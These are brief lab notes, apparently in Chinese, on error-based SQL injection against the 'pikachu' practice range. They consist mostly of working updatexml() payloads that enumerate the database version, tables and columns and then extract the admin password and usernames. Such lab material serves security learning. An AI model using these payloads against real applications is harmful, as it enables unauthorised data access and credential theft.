pikachu(基于报错）

updatexml()

zrtonnn' and updatexml(1,concat(0x7e,version()),0)#   

zrtonnn' and updatexml(1,concat(0x7e,database()),0)# 可以用来查询数据库

0x7e是~ version()版本，可以用来查询版本 #用来注释掉后面的内容

#报错只能一次显示一行

zrtonnn' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu')),0)#

可以使用limit一次一次进行获取表名

zrtonnn' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu' limit 0,1)),0)#

如果我们想要得到第二个表名呢

zrtonnn' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu' limit 1,1)),0)#

将limit后面的修改为1即可得到第二个表名

获取到表名后，在获取列名，思路是一样的

zrtonnn' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='pikachu' limit 0,1)),0)#

获取到列名后，再来获取数据：

zrtonnn' and updatexml(1,concat(0x7e,(select password from users where username='admin' limit 0,1)),0)# //获取密码

zrtonnn' and updatexml(1,concat(0x7e,(select username from users limit 0,1)),0)# //获取用户名